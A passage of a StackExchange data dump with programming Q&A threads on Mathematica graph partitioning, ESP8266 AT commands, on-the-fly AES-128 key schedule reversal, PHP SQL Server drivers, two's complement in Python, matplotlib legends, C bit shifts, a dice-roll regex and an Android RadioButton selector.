You'd need to configure the forked\nrepository separately on Codeship or push the branch to the already\nconfigured repository instead.\n\nhttps:\/\/codeship.com\/documentation\/faq\/testing-prs-from-forked-repositories\/\n","meta":{"source":"stackoverflow","title":"configure codeship to run when non-contributors make pull requests","dup_signals":{}},"subset":"stackexchange"} +{"text":"Finding the best-fitting subsets by frequencies of list item groupings\n\nQuestion: Suppose I have a list of groups:\n<code>{{1,2,3,4}, {1,2}, {3,4}}<\/code>\nIn this example, <code>1<\/code> most commonly appears within a group that contains <code>2<\/code>, and <code>3<\/code> most commonly appears in a group which contains <code>4<\/code>. If we form <code>N<\/code> subgroups, where N==2, the best-fitting subgroups by frequency of grouping would be <code>{{1,2}, {3,4}}<\/code>.\nAs a second example, a list of groups could be defined as:\n<code>{{1,2,3}, {1,2}, {2,3}, {3,4}}<\/code>\nIn this example:\n\n<code>1<\/code> is in a group with <code>2<\/code>: 2\/2 times\n\n<code>1<\/code> is in a group with <code>3<\/code>: 1\/2 times\n\n<code>1<\/code> is in a group with <code>4<\/code>: 0\/2 times\n\n<code>2<\/code> is in a group with <code>1<\/code>: 2\/3 times\n\n<code>2<\/code> is in a group with <code>3<\/code>: 2\/3 times\n\n<code>2<\/code> is in a group with <code>4<\/code>: 0\/3 times\n\n<code>3<\/code> is in a group with <code>1<\/code>: 1\/3 times\n\n<code>3<\/code> is in a group with <code>2<\/code>: 2\/3 times\n\n<code>3<\/code> is in a group with <code>4<\/code>: 1\/3 times\n\n<code>4<\/code> is in a group with <code>1<\/code>: 0\/1 time\n\n<code>4<\/code> is in a group with <code>2<\/code>: 0\/1 time\n\n<code>4<\/code> is in a group with <code>3<\/code>: 1\/1 time\n\nSuch that a valid subset grouping would include <code>{{1,2,3},{4}}<\/code> but not <code>{1,2,3,4}<\/code> (since <code>1<\/code> is never grouped with <code>4<\/code>). I'm not quite sure how one would score the alternative groupings to rank <code>{{1,2,3},{4}}<\/code> against another possible grouping like <code>{{1,2}, {3,4}}<\/code> to determine the best-fitting options.\nI'm open to the idea of allowing multiple subgroups to include the same item, but the number of groups returned should be manageable for large collections of unique items, such as not to explode into a full set of combinations.\nWith a large collection of lists, how might I divide the unique items across all sets into the best fitting subgroups, defined by the most common frequencies of the groupings?\nAnswer: I think you can pose this as a graph partitioning problem, and in the case where you want ideal groupings, <code>FindGraphPartition<\/code> \"finds a partition such that the sum of edge weights for edges having endpoints in different parts is minimized\" according to the documentation. 
Here our edge weights are the number of co-occurences:\n<code>list = {{1,2,3}, {1,2}, {2,3}, {3,4}};\nallitems = Flatten[list] \/\/ DeleteDuplicates;\n\ncountoccur[groups_, {i_, j_}] := \n Count[ContainsAll[#, {i, j}] & \/@ groups, True]\n\nedges = DeleteCases[\n If[Unequal @@ #, {UndirectedEdge @@ #, countoccur[list, #]}, \n Nothing] & \/@ Subsets[allitems, {2}], {_, 0}];\n\ng = Graph[edges[[All, 1]], EdgeWeight -> edges[[All, 2]], \n VertexLabels -> Automatic, EdgeLabels -> \"EdgeWeight\"];\n\n(* add any missing vertices culled earlier (items in isolated groups)*)\ng = VertexAdd[g, Complement[allitems, VertexList[g]]];\n\n(* use the second argument of FindGraphPartition here if you want n \n groups for each graph component *)\npartitions = If[Length[#] > 1, FindGraphPartition[Subgraph[g, #]], {#}] & \/@ \n ConnectedComponents[g];\n\nresult = Join @@ partitions\n(* result: {{3, 4}, {1, 2}} *)\n<\/code>\nComment: @iRyanBell I've updated the answer. It might help to give a few other 'official' examples in the question to test against.\nComment: It's still broken in some trivial cases like `{{1, 2}, {3}}` - I will fix that\nComment: This had to go through several revisions! But it finally works for disconnected graphs too.\nComment: This looks very close! If we have a list `{{1,2,3}, {1,2}, {3,4}}`, item `1` should never be included in a subset with item `4` as they have a grouping frequency of zero.\nComment: This is very nice! The graph partitioning function describes the problem well.\nAnswer: An alternative approach: construct a <code>WeightedAdjacencyGraph<\/code> from input list and apply <code>FindGraphPartition<\/code>:\n<code>ClearAll[waG]\nwaG = Module[{vl = Union @@ #}, \n WeightedAdjacencyGraph[vl, Normal[Total[(# + Transpose[#] &@\n SparseArray[Subsets[#, {2}] -> 1, {1, 1} Length@vl]) & \/@ #]] \/. 0 -> \u221e]] &;\n\nFindGraphPartition @ waG @ {{1, 2, 3}, {1, 2}, {2, 3}, {3, 4}}\n<\/code>\n\n<code> {{3, 4}, {1, 2}}\n<\/code>\n\n<code>FindGraphPartition @ waG @ {{1, 2}, {3}}\n<\/code>\n\n<code> {{1, 2}, {3}}\n<\/code>\n\n<code>FindGraphPartition @ waG @ {{1, 2, 3}, {1, 2}, {3, 4}}\n<\/code>\n\n<code> {{3, 4}, {1, 2}}\n<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"Finding the best-fitting subsets by frequencies of list item groupings","dup_signals":{}},"subset":"stackexchange"} +{"text":"GET not possible in esp8266 wtih AT commands\n\nQuestion: Im trying to get temperature from website from my ESP controller. i used the same requests using IE and Fiddler they are working very fine. 
im doing nothing wrong also from ESP point of view.\nplease find my esp request and response below.\n\n<code>AT+CIPSTART=\"TCP\",\"http:\/\/myesp8266.comlu.com\",80\\r\\n\n<\/code>\n\n<code>CONNECT<\/code>\n<code>OK<\/code>\n\n<code>AT+CIPSEND=93\\r\\n<\/code>\n\n<code>OK<\/code>\n<code>><\/code>\n\n<code>GET http:\/\/myesp8266.comlu.com\/temp_post.php?temps=15 HTTP\/1.0\\r\\n\n\nHost: myesp8266.comlu.com\\r\\n\\r\\n`\n<\/code>\n\n<code>Recv 93 bytes<\/code>\n<code>SEND OK<\/code>\n<code>+IPD,574:HTTP\/1.1 302 Found<\/code>\n<code>Date: Tue, 09 May 2017 02:20:31 GMT<\/code>\n<code>Server: Apache<\/code>\n<code>Location: https:\/\/www.000webhost.com\/migrate?<\/code>\n<code>utm_source=000&utm_medium=rdr&utm_campaign=old_panel_off&static=true<\/code>\n<code>Content-Length: 299<\/code>\n<code>Connection: close<\/code>\n<code>Content-Type: text\/html; charset=iso-8859-1<\/code>\n<code><!DOCTYPE HTML PUBLIC \"-\/\/IETF\/\/DTD HTML 2.0\/\/EN\"><\/code>\n<code><html><head><\/code>\n<code><title>302 Found<\/title><\/code>\n<code><\/head><body><\/code>\n<code><h1>Found<\/h1><\/code>\n<code><p>The document has moved <a href=\"https:\/\/www.000webhost.com\/migrate?<\/code>\n<code>utm_source=000&utm_medium=rdr&utm_campaign=old_panel_off&static=true\">here<\/a>.<\/p><\/code>\n<code><\/body><\/html><\/code>\n<code>CLOSED<\/code>\nwhen i use IE i receive the following for the request\n\n<code>http:\/\/myesp8266.comlu.com\/temp_post.php?temps=15<\/code>\n\n<code>response -><\/code>\n<code>Notice: Undefined index: temperature in \/storage\/h9\/116\/1546116\/public_html\/temp_post.php on line 2\n15<\/code>\n<code>Temperature : Celcius<\/code>\n<code>15 is what i expect and im receiving it good...<\/code>\nBelow is the code from fiddler which im receiving good\n\n<code>send -><\/code>\n\n<code>GET http:\/\/myesp8266.comlu.com\/temp_post.php?temps=15 HTTP\/1.0<\/code>\n<code>Host: myesp8266.comlu.com<\/code>\n\n<code>response -><\/code>\n\n<code>HTTP\/1.1 200 OK<\/code>\n<code>Date: Tue, 09 May 2017 02:08:40 GMT<\/code>\n<code>Content-Type: text\/html; charset=UTF-8<\/code>\n<code>Connection: close<\/code>\n<code>Server: awex<\/code>\n<code>X-Xss-Protection: 1; mode=block<\/code>\n<code>X-Content-Type-Options: nosniff<\/code>\n<code>X-Request-ID: ce6759371cbb05088c5c954aa35de737<\/code>\n<code><br \/><\/code>\n<code><b>Notice<\/b>: Undefined index: temperature in<\/code>\n<code><b>\/storage\/h9\/116\/1546116\/public_html\/temp_post.php<\/b> on line <b>2<\/b><br \/>\n15<p>Temperature : Celcius <\/p><\/code>\nwhere is wrong?? tried in many possible ways. but no success with only ESP8266 remaining ways working good. 
\nplease help.\nthank you\nAnswer: Your first AT command establishes a TCP connection, but includes <code>http:\/\/<\/code> which it probably shouldn't as at this point it's not yet relevant (we're just opening a socket) \nIncorrect AT command: \n<code>AT+CIPSTART=\"TCP\",\"http:\/\/myesp8266.comlu.com\",80\\r\\n<\/code>\nCorrected AT command:\n<code>AT+CIPSTART=\"TCP\",\"myesp8266.comlu.com\",80\\r\\n<\/code>\nThe next problem is your get request\nThe host name should only be specified probably on the <code>Host<\/code> header also protocol isn't required on this line also the GET requests URL should be relative to the host I believe.\nYour request:\n<code>GET http:\/\/myesp8266.comlu.com\/temp_post.php?temps=15 HTTP\/1.0\\r\\n\nHost: myesp8266.comlu.com\\r\\n\\r\\n<\/code>\nCorrected request:\n<code>GET \/temp_post.php?temps=15 HTTP\/1.0\\r\\n\nHost: myesp8266.comlu.com\\r\\n\\r\\n<\/code>\nBesides these 2 changes guessing that's a send length after <code>AT+CIPSEND<\/code> so may need to update that too it may even be possible to omit the length entirely. \nFinally you've got a minor issue in <code>temp_post.php<\/code> which is throwing a notice you can fix this by either altering the error reporting levels or if you post some code I'll have a look :). Alternatively if you want a cheap and nasty fix prefix whatever variable is causing it with an <code>@<\/code> ie <code>@$myTemps['temperature']<\/code> (although definitely better to fix the issue)\nAnswer: simply beautiful\ni ve deleted <code>http:\/\/<\/code>\n\nCorrected AT command: and modified as you mentioned\n\n<code>AT+CIPSTART=\"TCP\",\"myesp8266.comlu.com\",80\\r\\n\n<\/code>\nworked like charm.. \nahhh.. what a breath.. tried in all possible ways except modifying CIP start. \n\n1000 thanks for resolving.\n\nGood day dear.\nComment: You're very welcome :) If my answer was correct can you please select it as the correct answer. Also I realize formatting options can be a bit limiting at times but a message like this is best suited to a comment :). If you need help with the PHP notice still either edit the question with a bit of code or comment with the first couple of lines of `temp_post.php` and I'll take a look :)\nComment: Yes. decided as right answer tick mark. and Php i ve updated myselves (it uses just a echo reply :) so simple)... and sure in future i will have some issue with php sql programming. Actually im good at programming microcontrollers. but coming to IOT and other web http realted stuffs im very poor.(TCP IP absolutely 0). Thanks for providing your kind helping hand. Let me know if you are interested too.. i will share my simple project. Note: im not 100% working on it. whenever i get free time i used to sit and work on this stuff to feel occupied in leasure time. One day i will aplly if works good\nComment: Thanks, and you're very welcome :). When it comes to PHP and SQL SO is great just ask away when you need help :) Personally I'm the opposite I came from a web background and am learning to program microcontrollers but also have good low level knowledge when it comes to TCP\/IP and HTTP. I can't commit to working on any new projects at the moment due to an injury but I try to check SO every day so if you need help just post a question or yell out :)\nComment: Great Brian... nice talking and sharings. Im sorry for your injury.. get well soon.We will keep in touch and i will share all my simple works what ive done with passwords to you if u share ur email. 
Just to have a look...mine is firstname.lastname@example.com..two weeks i ll be busy shifting to new office.. if i get time in between i will share alll..in 10 min u will understand my simple php codes.. Im from India by the way.\n","meta":{"source":"stackoverflow","title":"GET not possible in esp8266 wtih AT commands","dup_signals":{}},"subset":"stackexchange"} +{"text":"On-the-fly computation of AES Round Keys for decryption?\n\nQuestion: The usual implementation of AES first computes all the Round Keys sequentially starting from the key, and stores them in RAM for later uses. However, when enciphering a single block with a key that will be used for that purpose only, or when RAM is very sparse, or perhaps in hardware, it is advantageous to use the Round Keys a they are being generated, rather than store them. Quoting the Rijndael submission to NIST:\n\nThe key schedule can be implemented without explicit use of the array <code>W[Nb*(Nr+1)]<\/code>. For implementations where RAM is scarce, the Round Keys can be computed on-the-fly using a buffer of <code>Nk<\/code> words with almost no computational overhead.\n\nIt is said this also works for deciphering:\n\nThe key expansion operation that generates <code>W<\/code> is defined in such a way that we can also start with the last <code>Nk<\/code> words of Round Key information and roll back to the original Cipher Key. So, calculation 'on-the-fly' of the Round Keys, starting from an \"Inverse Cipher Key\", is still possible.\n\nHowever, the how-to is left as an exercise to the reader. In particular: Can the last Round Key (the first used when deciphering) be computed directly, rather than sequentially?\nComment: I think the idea is to run the key schedule once forward to the last round key, and store this, and then for each block run it backwards to get the individual round keys.\nComment: I think one can write a big formula for the last round key, but you will have to apply at least all the [$f_i$ functions](http:\/\/crypto.stackexchange.com\/a\/1527\/58) sequentially, so I don't think it is much faster\/simpler than running the key schedule. I didn't analyze this thoroughly, though, so I'm a bit resisting to plainly answer \"No\".\nComment: Welcome to Cryptography.SE. Your question is not totally clear. The key schedule is there, there are tons of implementations. So what do you want?\nComment: Did you read https:\/\/en.wikipedia.org\/wiki\/AES_key_schedule\nComment: @Pa\u016dloEbermann: I understand how what you describe can work, and might be useful if there is not enough RAM (or flip-flops) to store the Round Keys even temporarily. So the answer to \"_Can the last Round Key be computed directly, rather than sequentially?_\" would be: \"_No_\"?\nComment: **just to mention that it is a128b aes decryption\nComment: Hey! Thanks. I'm asking how is the inverse key expansion on aes is preformed. Lest say that I have the key for the decryption. How can I use it for the decryption process?\nComment: I read that Wikipedia article but it explains the key expansion during encryption and not during decryption. I look for the aes inverse key expansion. I know that every step ha an inverse one. What I'm asking is what is the inverse step of the key expansion\nAnswer: This self-answer is heavily based on comments by Pa\u016dlo Ebermann.\nWhen performing AES decryption with on-the-fly computation of AES Round Keys, there is no choice beyond running the key schedule forward to the last Round Key (the first used when deciphering). 
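To make that forward-and-backward stepping concrete, here is a minimal Python sketch (illustrative only, not an optimized or constant-time implementation; the helper names are invented for this sketch, and the S-box is rebuilt from its algebraic definition just so the snippet stays self-contained) of one forward step of the AES-128 key schedule and the matching backward step. Note that the backward step applies the ordinary forward S-box, not the inverse one:\n<code>def _xtime(a):\n    # multiply by x in GF(2^8) with the AES reduction polynomial\n    a <<= 1\n    return (a ^ 0x11B) & 0xFF if a & 0x100 else a\n\ndef _gmul(a, b):\n    # general multiplication in GF(2^8)\n    r = 0\n    while b:\n        if b & 1:\n            r ^= a\n        a = _xtime(a)\n        b >>= 1\n    return r\n\ndef _build_sbox():\n    # S-box = affine transform of the multiplicative inverse; S(0) = 0x63\n    sbox = [0x63] * 256\n    for x in range(1, 256):\n        inv = next(y for y in range(1, 256) if _gmul(x, y) == 1)\n        s = 0\n        for i in range(8):\n            bit = ((inv >> i) ^ (inv >> ((i + 4) % 8)) ^ (inv >> ((i + 5) % 8)) ^ (inv >> ((i + 6) % 8)) ^ (inv >> ((i + 7) % 8)) ^ (0x63 >> i)) & 1\n            s |= bit << i\n        sbox[x] = s\n    return sbox\n\nSBOX = _build_sbox()\n\ndef _g(word, rcon):\n    # RotWord, then SubWord, then XOR the round constant into the first byte\n    w = [SBOX[b] for b in word[1:] + word[:1]]\n    w[0] ^= rcon\n    return w\n\ndef next_round_key(rk, rcon):\n    # one forward step: 16-byte round key in, next 16-byte round key out\n    out = []\n    prev = _g(rk[12:16], rcon)\n    for i in range(4):\n        prev = [rk[4 * i + j] ^ prev[j] for j in range(4)]\n        out += prev\n    return out\n\ndef prev_round_key(rk, rcon):\n    # one backward step: words 1..3 of the previous key are plain XORs,\n    # word 0 needs _g of the recovered word 3, using the same forward S-box\n    out = [0] * 16\n    for i in range(3, 0, -1):\n        for j in range(4):\n            out[4 * i + j] = rk[4 * i + j] ^ rk[4 * (i - 1) + j]\n    t = _g(out[12:16], rcon)\n    for j in range(4):\n        out[j] = rk[j] ^ t[j]\n    return out\n\n# round-trip check with an arbitrary key and the first round constant 0x01\nkey = list(range(16))\nassert prev_round_key(next_round_key(key, 0x01), 0x01) == key\n<\/code>\nRunning the schedule backwards this way only needs the previous round constant at each step, which is where the Rcon un-doubling mentioned below comes in if you generate the constants on the fly.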
The structure of the key schedule creates enough non-linearity and diffusion at each of the 10 steps that no shortcut is practicable. One step comprises 4 SubBytes transformations, 16 XORs of 8-bit quantities, some rotations of all the 16 bytes of the Round Keys, and the doubling of the byte Rcon in $\\operatorname{GF}(2^8)$, in a manner such that what's produced by a byte XOR goes thru SubBytes on the next step, and non-linearly influence all the 16 bytes after 4 steps. Even halving the number of steps to reach the last Round Key would be extremely hairy, to the point of being counterproductive.\nThere are however two implementation variants:\n\nIf about 160 bytes of additional temporary RAM are available, the Round Keys can be stored as they are computed, and re-used during the decryption.\nOtherwise (and memory is often tight in a small micro-controller, or unavailable in hardware), each of the 10 steps can easily be reversed. The only remote difficulty is the un-doubling of the Rcon; it can be implemented using a small ROM table, or as <code>Rcon=((0x00-(Rcon&0x01))&0x8D)^(Rcon>>1)<\/code>. As pointed by Craig McQueen in comment, the reversal of the key schedule uses the direct AES SBox.\n\nHardware implementations typically do 2; both options are justifiable in software.\nComment: Reversing the key schedule calculations on-the-fly for decryption doesn't actually need an inverse S-box. It still uses the regular S-box.\nComment: @Craig McQueen: you are absolutely right! Fixed the answer accordingly.\nAnswer: I've implemented AES-128 with byte calculations for a small embedded systems, with optional on-the-fly key schedule calculation. See aes-min on github.\nThe key schedule starting point for decryption must be obtained by running the key schedule calculation forwards, calculating all the rounds of the key schedule, to get to the last round. For a particular key, that decryption key schedule starting point only needs to be done once and saved. After that, the on-the-fly-key-schedule decryption runs the key schedule calculation backwards during each decryption operation.\nReversing the key schedule calculation requires the forwards S-box, so on-the-fly-key-schedule decryption requires both the forwards and inverse S-boxes.\nAnswer: The simplest way to perform the AES key expansion for decryption is to do it just as for encryption, but storing the subkeys as they are generated, rather than using them. Then use them for decryption, just in the reverse of the order they where produced.\nAnother option, often used in hardware (much less useful in software), and relatively simple since it's AES-128, is to sequentially compute the last subkey, again just as for encryption; use it; then repeatedly walk back to the previous ones using the fact that the transformation from one subkey to the next is easily reversed. This saves RAM, trading is against computation.\nBoth methods use that the 11 subkeys (the first of which is the key) are the same for encryption and decryption, only used is the natural order they are produced for encryption, and the reverse order for decryption.\nComment: So you mean that I should store the different key each round in a variable. So the inverse key expansion is the same but it will be preformed before the actual decryption. So the inverse key expansion will first create 9 different round keys and store them. Right after that the decryption process will take place with the round keys in the reverse order?\nComment: @Ilay Samuelov: there are 11 AddRoundKeys. 
The first one is the key itself. The last is used right after being generated, thus needs not absolutely be stored if you redo the key schedule for each block. So you can get away with storing 9 subkeys, and special-case the first (last used in decryption) and last (first used) of the 11 subkeys. Still, the simplest is to make an array with the 11 subkeys, And you need at least 10 + the initial key for speed with multiple blocks.\nComment: Hey! In x86 it can be a bit hard to do that. But I thought on a way! Maybe storing al the round keys in order i a big one array. Then taking the last 16 bits by doing: `Arr[160]-arr[144]`\nComment: @Ilay Samuelov: please don't make numerous separate comments, especially within the time allowance for editing these. That eats vertical space and other resources, and can raise automated alerts. The process of joining comments is largely manual, tedious, error-prone, and reserved to mods.\n","meta":{"source":"crypto.stackexchange","title":"On-the-fly computation of AES Round Keys for decryption?","dup_signals":{}},"subset":"stackexchange"} +{"text":"PHP 5.4 connection to MS SQL server 2008 r2\n\nQuestion: Am want to connect to an existing MS-SQL database on local host i have installed MS-SQL drivers 3.0 and edited php.ini to enable the extension i.e.\n<code> extension=php_sqlsrv_54_ts.dll\n<\/code>\ni have installed native client 10.0 and get this error:\n<code>array (size=2)\n 0 => \n array (size=6)\n 0 => string 'IMSSP' (length=5)\n 'SQLSTATE' => string 'IMSSP' (length=5)\n 1 => int -49\n 'code' => int -49\n 2 => string 'This extension requires the Microsoft SQL Server 2012 Native Client. Access the following URL to download the Microsoft SQL Server 2012 Native Client ODBC driver for x86: http:\/\/go.microsoft.com\/fwlink\/?LinkId=163712' (length=216)\n 'message' => string 'This extension requires the Microsoft SQL Server 2012 Native Client. Access the following URL to download the Microsoft SQL Server 2012 Native Client ODBC driver for x86: http:\/\/go.microsoft.com\/fwlink\/?LinkId=163712' (length=216)\n<\/code>\nIf i try to install Microsoft SQL Server 2012 Native Client the error is operating system not supported.\nThe server is running MS Server 2008 R2, MS-SQL 2008 R2 and Apache 2.4.4 \nComment: Did you get the right version? Can't install a 64bit native client on a 32bit os, or vice versa\nComment: The server is 64 bit, the native client installer installs both 64 and 32 bit or so i seem to understand here\nAnswer: From the error message it seems you need to download and install \"Microsoft SQL Server 2012 Native Client ODBC driver for x86\" which should be available from here:\nhttp:\/\/www.sqlservercentral.com\/Forums\/Topic1458276-2799-1.aspx\nMake sure you get the right version of Native Client for your operating system\nthat page has all links on getting MSQL working for you.\nComment: OK tried everything on the page but still not working, got an idea how why native client 2012 will not install? I am running update on the server now which should fix windows installer compatibility issue\n","meta":{"source":"stackoverflow","title":"PHP 5.4 connection to MS SQL server 2008 r2","dup_signals":{}},"subset":"stackexchange"} +{"text":"Two's Complement algorithm in Python\n\nQuestion: I have to do a two's complement conversion of a 3D surface, each element representing a 12 bit two's complement number.\nIn order to convert the array I have the following code:\n<code>for x in np.nditer(array, op_flags=['readwrite']):\n x[...] 
= twos_comp(x, 12)\n<\/code>\nwhere I found the following function online:\n<code>def twos_comp(val, bits):\n\"\"\"compute the 2's complement of int value val\"\"\"\nif (val & (1 << (bits - 1))) != 0: # if sign bit is set e.g., 8bit: 128-255\n val = val - (1 << bits) # compute negative value\nreturn val\n<\/code>\nHowever, the result I'm getting doesn't make any sense. Is my code wrong?\nThe other thing I have tried is:\n<code> for x in np.nditer(array, op_flags=['readwrite']):\n if x > 2047:\n x[...] = (2047 - x)\n else:\n x[...] = x\n<\/code>\nbut again the data doesn't look \"right\". Any suggestions?\nThanks\nBy \"not right\" I mean that I'm expecting a surface that looks like\n\nBut, instead I'm getting a surface that looks like this (there is also a multiplier of 80 that explains why the numbers in the z-axis are so large)\nComment: what do you mean by \"doesn't make any sense\" and \"doesn't look right\". Could you share some sample and show what is returned vs. what **should** be returned? In short a [mcve] would help a lot :)\nAnswer: Some relative contents are already available here:\nPython - Most effective way to implement two's complement?\nand here:\nTwo's Complement in Python\nComment: Thanks, I've read most of them and that's where I've got my existing code from. Does `np.nditer(array, op_flags=['readwrite'])` do what I think it does? That is loop through every element of the array, updating the value by the result of the code in the loop\nAnswer: Use this simple function\n<code>def twos_comp(val):\n return 0b111111111111 - val # 12 ones\n<\/code>\nYou may test it with\n<code>val = 0b111100001111\nprint(\"{:012b}\".format(twos_comp(val)))\n<\/code>\nand you will got\n\n000011110000\n\nIf it is not what you wanted, use this function instead\n<code>def twos_comp(val):\n return 0b1000000000000 - val # 1 with 12 zeroes\n<\/code>\nComment: Thank you, I think this has got it. Any idea why I'm getting a negative of what I expect?\n","meta":{"source":"stackoverflow","title":"Two's Complement algorithm in Python","dup_signals":{}},"subset":"stackexchange"} +{"text":"python matplotlib: label in histogram\n\nQuestion: I am using Python (3.4) Jupyter Notebook. I tried to plot a histogram with label using the code below. \n<code> %matplotlib notebook\n import matplotlib.pyplot as plt\n import matplotlib\n import numpy as np\n\n bins = np.linspace(0, 1.0, 40)\n\n plt.hist(good_tests, bins, alpha = 0.5, color = 'b' , label = 'good')\n plt.show()\n<\/code>\nBut the label 'good' doesn't show at all. Did I miss anything? Thanks!\nAnswer: you need to add a legend. See legend for details.\n<code>plt.legend()\n<\/code>\n","meta":{"source":"stackoverflow","title":"python matplotlib: label in histogram","dup_signals":{}},"subset":"stackexchange"} +{"text":"Bitwise operations (shifting return values)\n\nQuestion: <code>if (((number >> i) & 1) == 1)<\/code>\nthis is my code example.\nHow is the return value determined in this operation? We shift numbers to the right or left. what is the return value?\n<code>if (((number >> i) & 1) == 1)<\/code>\nComment: (number >> i) will shifter number i times to the right. Then \"& 1\" will AND that with 1, which will be either 1 or 0. And lastly we check if it actually was a 1. 
So the whole if statement checks if bit i is set in number.\nComment: See [Bitwise logic](https:\/\/en.cppreference.com\/w\/c\/language\/operator_arithmetic#Bitwise_logic), [Shift operators](https:\/\/en.cppreference.com\/w\/c\/language\/operator_arithmetic#Shift_operators) and [Equality operators](https:\/\/en.cppreference.com\/w\/c\/language\/operator_comparison#Equality_operators). In general: [Expressions](https:\/\/en.cppreference.com\/w\/c\/language\/expressions)\nAnswer: <code>number >> i<\/code> bitwise-shifts <code>number<\/code> to the right by <code>i<\/code> bits:\n<code> number i number >> i\n ------ - -----------\n01010101 1 00101010\n01010101 2 00010101\n01010101 3 00001010\n<\/code>\netc.\n<code>(number >> i) & 1<\/code> does a bitwise-AND of <code>number >> 1<\/code> against <code>1<\/code>:\n<code> 00101010 (01010101 >> 1)\n& 00000001\n----------\n 00000000\n\n 00010101 (01010101 >> 2)\n& 00000001\n----------\n 00000001\n<\/code>\nSo basically,\n<code>if (((number >> i) & 1) == 1)\n<\/code>\nwill branch if the low bit of the shifted value is set.\nAnswer: \nHow is the return value determined in this operation?\n\nThere is no return value. There is an if statement with the equality operator\n<code>if (((number >> i) & 1) == 1)\n<\/code>\nThe result of the equality operator is value <code>0<\/code> or <code>1<\/code> of the type <code>int<\/code> dependent on whether two operands, <code>((number >> i) & 1)<\/code> and <code>1<\/code>, of the expression are unequal or equal to each other correspondingly. If the result is <code>1<\/code> (operands are equal each other) then the sub-statement of the if statement will get the control.\nSo the of statements checks whether the <code>i-th<\/code> bit of <code>number<\/code> is set to 1 or to 0.\nAnswer: <code>>><\/code> is a right-shift operator in C language.\nIt depends on three factors that the result of <code>((number >> i) & 1)<\/code> would be.\n\nThe type of the <code>number<\/code> is either signed or unsigned.\nThe total size in bit of the <code>number<\/code>, i.e. 8*sizeof(number).\nThe value of <code>i<\/code>.\n\n<code>number<\/code> is signed\n<code>number<\/code> is unsigned\n\nThe value of <code>i<\/code> >= The total size in bit of the <code>number<\/code>\nthe signed bit of <code>number<\/code>\n0\n\nThe value of <code>i<\/code> < The total size in bit of the <code>number<\/code>\nthe <code>i<\/code>-th bit of <code>number<\/code> (LSb is 0-th bit)\nthe <code>i<\/code>-th bit of <code>number<\/code> (LSb is 0-th bit)\nComment: Shifting signed integers right is implementation-defined. Not all implementations shift in copies of the sign bit.\n","meta":{"source":"stackoverflow","title":"Bitwise operations (shifting return values)","dup_signals":{}},"subset":"stackexchange"} +{"text":"Match pattern with and without spaces\n\nQuestion: I am using markjs to search a page and highlight things that would be considered dice rolls. So it using the regex expression <code>\/([1-9]\\d*)?d(?:4|6|8|10|12|20)([+-]\\d+)?\/i<\/code> which actually works pretty well when the text is formatted as so <code>1d10+2<\/code> however if the text has any spaces, it only grabs highlights the first part. For example, if the same thing is written as <code>1d10 + 2<\/code> it will only highlight the <code>1d10<\/code>.\nIs there something I can adjust in my regex that will account for spaces around the <code>+<\/code> or <code>-<\/code> symbols?\nComment: Just include `\\s*` where ever there is a possibility of spaces. 
[Shown here](https:\/\/regex101.com\/r\/KQkjUz\/1\/)\nAnswer: you can use the <code>\\s<\/code> for blank spaces, so your regex could be something like this:\n<code>([1-9]\\d*)?d(?:4|6|8|10|12|20)\\s?([+-]\\s?\\d+)\n<\/code>\nComment: you ever hate when something works on the jsfiddle and not what you're actually trying to get it to work on. This appears to be working on jsfiddle but not my chrome extension. So I'll have to play around some.\n","meta":{"source":"stackoverflow","title":"Match pattern with and without spaces","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can not set a selector to background of RadioButton\n\nQuestion: I got a strange error when I try to set a selector to background of RadioButton.\nMy layout is simply:\n\n<code><android.support.v4.view.ViewPager\n android:id=\"@+id\/viewpager\"\n android:layout_width=\"match_parent\"\n android:layout_height=\"0dp\"\n android:layout_weight=\"1\" \/>\n\n<RadioGroup\n android:layout_width=\"match_parent\"\n android:layout_height=\"wrap_content\"\n android:orientation=\"horizontal\" >\n\n <RadioButton\n android:id=\"@+id\/rbtnPhoto\"\n android:layout_width=\"0dp\"\n android:layout_height=\"wrap_content\"\n android:layout_weight=\"1\"\n android:background=\"@drawable\/icon_photo_selector\" \/>\n\n <RadioButton\n android:id=\"@+id\/rbtnTagline\"\n android:layout_width=\"0dp\"\n android:layout_height=\"wrap_content\"\n android:layout_weight=\"1\"\n android:background=\"@drawable\/icon_tagline_selector\" \/>\n\n <RadioButton\n android:id=\"@+id\/rbtnTranslator\"\n android:layout_width=\"0dp\"\n android:layout_height=\"wrap_content\"\n android:layout_weight=\"1\"\n android:background=\"@drawable\/icon_translator_selector\"\/>\n\n <RadioButton\n android:id=\"@+id\/rbtnDiscount\"\n android:layout_width=\"0dp\"\n android:layout_height=\"wrap_content\"\n android:layout_weight=\"1\"\n android:background=\"@drawable\/icon_discount_selector\" \/>\n<\/RadioGroup>\n<\/code>\n\nAnd my selector is:\n<code><selector xmlns:android=\"http:\/\/schemas.android.com\/apk\/res\/android\">\n\n <item android:drawable=\"@drawable\/icon_photo_selected\" android:state_checked=\"true\"><\/item>\n <item android:drawable=\"@drawable\/icon_photo_unselected\" android:state_checked=\"false\"><\/item>\n\n<\/selector>\n<\/code>\nAbove drawables are nine path images. I alway get the exception which is \"android.view.InflateException: Binary XML file line\". 
But the layout can be inflate if I change a selector by an image.\nPlease help me to resolve it.\nUpdated:\nMy images are nice patch images\nHere is my logs:\n<code> 12-09 15:36:07.256: E\/AndroidRuntime(15211): FATAL EXCEPTION: main\n12-09 15:36:07.256: E\/AndroidRuntime(15211): java.lang.RuntimeException: Unable to start activity ComponentInfo{com.paktor\/com.paktor.MainActivity}: android.view.InflateException: Binary XML file line #39: Error inflating class <unknown>\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:1960)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:1985)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.app.ActivityThread.access$600(ActivityThread.java:127)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1151)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.os.Handler.dispatchMessage(Handler.java:99)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.os.Looper.loop(Looper.java:137)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at android.app.ActivityThread.main(ActivityThread.java:4482)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at java.lang.reflect.Method.invokeNative(Native Method)\n12-09 15:36:07.256: E\/AndroidRuntime(15211): at java.lang.reflect.Method.invoke(Method.java:511)\n12-09 